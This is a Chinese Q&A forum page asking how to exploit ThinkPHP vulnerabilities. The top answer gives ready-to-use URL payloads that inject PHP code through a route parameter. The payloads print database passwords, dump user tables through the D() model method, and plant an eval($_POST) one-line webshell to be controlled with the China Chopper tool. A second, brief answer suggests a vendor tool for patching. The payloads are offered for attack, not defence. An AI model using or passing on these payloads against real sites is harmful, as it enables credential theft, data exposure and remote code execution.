thinkphp 怎么利用漏洞

如题所述

1. 使用URL可以查看用户的数据库帐号密码DB_NAME,DB_PASS,DB_HOST
http://site/index.php/module/action/param1/${@print(THINK_VERSION)}
http://site/index.php/module/action/param1/${@print(C(‘’))}
http://site/index.php/module/action/param1/${@print(C(‘DB_PASS’))}
2.使用模型D方法或者M方法,猜测后台帐号密码,当然首先要先猜一下用户的表名了
http://www.site.com/eetodaycom/index.php/Product/show/id/25/parm1/${@var_dump(D(user)->select())}
3.直接执行一句话代码,然后用菜刀直接连接.
http://site/index.php/module/action/param1/{${eval($_POST[s])}} 一句话密码:s
温馨提示:答案为网友推荐,仅供参考
第1个回答  2018-12-07
可以在腾讯智慧安全页面申请使用腾讯御点
然后使用这个软件上面的修复漏洞功能
直接对电脑的漏洞进行检测和修复就可以了

相关了解……

你可能感兴趣的内容

本站内容来自于网友发表,不代表本站立场,仅表示其个人看法,不对其真实性、正确性、有效性作任何的担保
相关事宜请发邮件给我们
© 非常风气网